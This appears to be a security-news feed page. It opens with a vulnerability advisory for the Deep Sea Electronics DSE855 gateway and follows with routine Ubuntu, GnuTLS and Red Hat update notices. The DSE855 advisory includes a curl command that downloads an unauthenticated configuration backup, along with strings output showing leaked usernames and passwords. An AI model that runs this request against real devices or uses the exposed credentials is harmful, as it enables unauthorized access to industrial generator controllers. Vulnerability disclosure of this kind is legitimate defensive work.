Deep Sea Electronics DSE855 is vulnerable to configuration disclosure when direct object reference is made to the Backup.bin file using an HTTP GET request. This will enable an attacker to disclose sensitive information and help her in authentication bypass, privilege escalation, and full system access.

  
Deep Sea Electronics DSE855 Remote Authentication Bypass

Vendor: Deep Sea Electronics plc  
Product web page: https://www.deepseaelectronics.com  
Affected version: Model: DSE855  
                  Software version: 1.0.26  
                  Module version: 1.0.78  
                  Bootloader version: 1.0.3  
                  Firmware version: 1.1.0

Summary: The DSE855 communications device allows monitoring of a single  
DSE controller with USB connectivity over a LAN or WAN connection. To achieve  
this the DSE855 utilises its in-built web server or MODBUS TCP. In order  
to use over a LAN connection the on-site router must be configured to be  
accessible from any global location.

Desc: The device is vulnerable to configuration disclosure when direct object  
reference is made to the Backup.bin file using an HTTP GET request. This will  
enable an attacker to disclose sensitive information and help her in authentication  
bypass, privilege escalation and full system access.

Tested on: embOS/IP

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5825  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5825.php  
ZDI ID: ZDI-24-671  
ZDI CAN: ZDI-CAN-22679  
ZDI URL: https://www.zerodayinitiative.com/advisories/ZDI-24-671/  
ZDI Title: (0Day) Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability  
CVE ID: CVE-2024-5947  
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-5947

10.11.2023

--

$ curl -s -O http://target/Backup.bin  
$ strings Backup.bin

DSEB  
Admin  
Password1234  
Tech  
Password1234  
thricer  
scada  
rd1234  
lokna  
xela123  
DSE855

Deep Sea Electronics DSE855 Remote Authentication Bypass

GnuTLS is a secure communications library implementing the SSL and TLS protocols and technologies around them. It provides a simple C language application programming interface (API) to access the secure communications protocols, as well as APIs to parse and write X.509, PKCS #12, OpenPGP, and other required structures. It is intended to be portable and efficient with a focus on security and interoperability.

GNU Transport Layer Security Library 3.8.6

Ubuntu Security Notice 6862-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Lukas Bernhard discovered that Firefox did not properly manage memory during garbage collection. An attacker could potentially exploit this issue to cause a denial of service, or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6862-1July 03, 2024firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code. (CVE-2024-5689,CVE-2024-5690, CVE-2024-5691, CVE-2024-5693, CVE-2024-5697, CVE-2024-5698,CVE-2024-5699, CVE-2024-5700, CVE-2024-5701)Lukas Bernhard discovered that Firefox did not properly manage memoryduring garbage collection. An attacker could potentially exploit thisissue to cause a denial of service, or  execute arbitrary code.(CVE-2024-5688)Lukas Bernhard discovered that Firefox did not properly manage memory inthe JavaScript engine. An attacker could potentially exploit this issue toobtain sensitive information. (CVE-2024-5694)Irvan Kurniawan discovered that Firefox did not properly handle certainallocations in the probabilistic heap checker. An attacker couldpotentially exploit this issue to cause a denial of service.(CVE-2024-5695)Irvan Kurniawan discovered that Firefox did not properly handle certaintext fragments in input tags. An attacker could potentially exploit thisissue to cause a denial of service. (CVE-2024-5696)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS   firefox                         127.0.2+build1-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:   https://ubuntu.com/security/notices/USN-6862-1   CVE-2024-5688, CVE-2024-5689, CVE-2024-5690, CVE-2024-5691,   CVE-2024-5693, CVE-2024-5694, CVE-2024-5695, CVE-2024-5696,   CVE-2024-5697, CVE-2024-5698, CVE-2024-5699, CVE-2024-5700,   CVE-2024-5701Package Information:   https://launchpad.net/ubuntu/+source/firefox/127.0.2+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6862-1

Ubuntu Security Notice 6860-1 - Reynir Bjoernsson discovered that OpenVPN incorrectly handled terminating client connections. A remote authenticated client could possibly use this issue to keep the connection active, bypassing certain security policies. This issue only affected Ubuntu 23.10, and Ubuntu 24.04 LTS. Reynir Bjoernsson discovered that OpenVPN incorrectly handled certain control channel messages with nonprintable characters. A remote attacker could possibly use this issue to cause OpenVPN to consume resources, or fill up log files with garbage, leading to a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6860-1  
July 02, 2024

openvpn vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in OpenVPN.

Software Description:  
- openvpn: virtual private network software

Details:

Reynir Björnsson discovered that OpenVPN incorrectly handled terminating  
client connections. A remote authenticated client could possibly use this  
issue to keep the connection active, bypassing certain security policies.  
This issue only affected Ubuntu 23.10, and Ubuntu 24.04 LTS.  
(CVE-2024-28882)

Reynir Björnsson discovered that OpenVPN incorrectly handled certain  
control channel messages with nonprintable characters. A remote attacker  
could possibly use this issue to cause OpenVPN to consume resources, or  
fill up log files with garbage, leading to a denial of service.  
(CVE-2024-5594)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   openvpn                         2.6.9-1ubuntu4.1

Ubuntu 23.10  
   openvpn                         2.6.5-0ubuntu1.2

Ubuntu 22.04 LTS  
   openvpn                         2.5.9-0ubuntu0.22.04.3

Ubuntu 20.04 LTS  
   openvpn                         2.4.12-0ubuntu0.20.04.2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6860-1  
   CVE-2024-28882, CVE-2024-5594

Package Information:  
   https://launchpad.net/ubuntu/+source/openvpn/2.6.9-1ubuntu4.1  
   https://launchpad.net/ubuntu/+source/openvpn/2.6.5-0ubuntu1.2  
   https://launchpad.net/ubuntu/+source/openvpn/2.5.9-0ubuntu0.22.04.3  
   https://launchpad.net/ubuntu/+source/openvpn/2.4.12-0ubuntu0.20.04.2

Ubuntu Security Notice USN-6860-1

Red Hat Security Advisory 2024-4278-03 - An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.4 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4278.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: qemu-kvm security updateAdvisory ID:        RHSA-2024:4278-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4278Issue date:         2024-07-02Revision:           03CVE Names:          CVE-2024-4467====================================================================Summary: An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.4Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Kernel-based Virtual Machine (KVM) is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm packages provide the user-space component for running virtual machines that use KVM.Security Fix(es):* qemu-kvm: QEMU: 'qemu-img info' leads to host file read/write (CVE-2024-4467)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-4467References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2024-4278-03

Red Hat Security Advisory 2024-4277-03 - An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4277.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: qemu-kvm security updateAdvisory ID:        RHSA-2024:4277-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4277Issue date:         2024-07-02Revision:           03CVE Names:          CVE-2024-4467====================================================================Summary: An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.2Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Kernel-based Virtual Machine (KVM) is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm packages provide the user-space component for running virtual machines that use KVM.Security Fix(es):* qemu-kvm: QEMU: 'qemu-img info' leads to host file read/write (CVE-2024-4467)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-4467References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2024-4277-03

Red Hat Security Advisory 2024-4276-03 - An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4276.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: qemu-kvm security updateAdvisory ID:        RHSA-2024:4276-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4276Issue date:         2024-07-02Revision:           03CVE Names:          CVE-2024-4467====================================================================Summary: An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.0Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Kernel-based Virtual Machine (KVM) is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm packages provide the user-space component for running virtual machines that use KVM.Security Fix(es):* qemu-kvm: QEMU: 'qemu-img info' leads to host file read/write (CVE-2024-4467)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-4467References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2024-4276-03

Red Hat Security Advisory 2024-4274-03 - An update for openstack-nova is now available for Red Hat OpenStack Platform 17.1.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4274.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Critical: Red Hat OpenStack Platform 17.1.3 (openstack-nova) security updateAdvisory ID:        RHSA-2024:4274-03Product:            Red Hat OpenStack PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4274Issue date:         2024-07-02Revision:           03CVE Names:          CVE-2024-32498====================================================================Summary: An update for openstack-nova is now available for Red Hat OpenStackPlatform 17.1 (Wallaby).Red Hat Product Security has rated this update as having a security impactof Critical. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available for each vulnerability fromthe CVE link(s) in the References section.Description:OpenStack Compute (codename Nova) is open source software designedto provision and manage large networks of virtual machines,creating aredundant and scalable cloud computing platform. It gives you the software,control panels, and APIs required to orchestrate a cloud, including runninginstances, managing networks, and controlling access through users andprojects.OpenStack Compute strives to be both hardware and hypervisoragnostic, currently supporting a variety of standard hardwareconfigurations and seven major hypervisors.Security Fix(es):* CVE-2024-32498 OpenStack: malicious qcow2/vmdk images(CVE-2024-32498)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-32498References:https://access.redhat.com/security/updates/classification/#criticalhttps://bugzilla.redhat.com/show_bug.cgi?id=2278663

Red Hat Security Advisory 2024-4274-03

Red Hat Security Advisory 2024-4273-03 - An update for openstack-cinder, openstack-glance, and openstack-nova is now available for Red Hat OpenStack Platform 16.2.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4273.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Critical: Red Hat OpenStack Platform 16.2.6 security updateAdvisory ID:        RHSA-2024:4273-03Product:            Red Hat OpenStack PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4273Issue date:         2024-07-02Revision:           03CVE Names:          CVE-2024-32498====================================================================Summary: An update for openstack-cinder, openstack-glance, and openstack-nova is nowavailable for Red Hat OpenStack Platform 16.2 (Train).Red Hat Product Security has rated this update as having a security impactof Critical. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available for each vulnerability fromthe CVE link(s) in the References section.Description:Cinder is the replacement of nova-volume in Folsom and beyond, use d forblock storage.OpenStack Image Service (code-named Glance) providesdiscovery,registration, and delivery services for virtual disk images. TheImage Service API server provides a standard REST interface for queryinginformation about virtual disk images stored in a variety of back-endstores, including OpenStack Object Storage. Clients can register newvirtual disk images with the Image Service, query for information onpublicly available disk images, and use the Image Service's client libraryfor streaming virtual disk images.OpenStack Compute (codename Nova) is open source software designedto provision and manage large networks of virtual machines,creating aredundant and scalable cloud computing platform. It gives you the software,control panels, and APIs required to orchestrate a cloud, including runninginstances, managing networks, and controlling access through users andprojects.OpenStack Compute strives to be both hardware and hypervisoragnostic, currently supporting a variety of standard hardwareconfigurations and seven major hypervisors.Security Fix(es):* CVE-2024-32498 OpenStack: malicious qcow2/vmdk images(CVE-2024-32498)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-32498References:https://access.redhat.com/security/updates/classification/#criticalhttps://bugzilla.redhat.com/show_bug.cgi?id=2278663

Red Hat Security Advisory 2024-4273-03

Red Hat Security Advisory 2024-4272-03 - An update for openstack-nova, openstack-glance, and openstack-cinder is now available for Red Hat OpenStack Platform 17.1.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4272.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Critical: Red Hat OpenStack Platform 17.1.3 security updateAdvisory ID:        RHSA-2024:4272-03Product:            Red Hat OpenStack PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4272Issue date:         2024-07-02Revision:           03CVE Names:          CVE-2024-32498====================================================================Summary: An update for openstack-nova, openstack-glance, and openstack-cinder is nowavailable for Red Hat OpenStack Platform 17.1 (Wallaby).Red Hat Product Security has rated this update as having a security impactof Critical. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available for each vulnerability fromthe CVE link(s) in the References section.Description:Cinder is the replacement of nova-volume in Folsom and beyond, use d forblock storage.OpenStack Image Service (code-named Glance) providesdiscovery,registration, and delivery services for virtual disk images. TheImage Service API server provides a standard REST interface for queryinginformation about virtual disk images stored in a variety of back-endstores, including OpenStack Object Storage. Clients can register newvirtual disk images with the Image Service, query for information onpublicly available disk images, and use the Image Service's client libraryfor streaming virtual disk images.OpenStack Compute (codename Nova) is open source software designedto provision and manage large networks of virtual machines,creating aredundant and scalable cloud computing platform. It gives you the software,control panels, and APIs required to orchestrate a cloud, including runninginstances, managing networks, and controlling access through users andprojects.OpenStack Compute strives to be both hardware and hypervisoragnostic, currently supporting a variety of standard hardwareconfigurations and seven major hypervisors.Security Fix(es):* CVE-2024-32498 OpenStack: malicious qcow2/vmdk images(CVE-2024-32498)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-32498References:https://access.redhat.com/security/updates/classification/#criticalhttps://bugzilla.redhat.com/show_bug.cgi?id=2278663

Latest News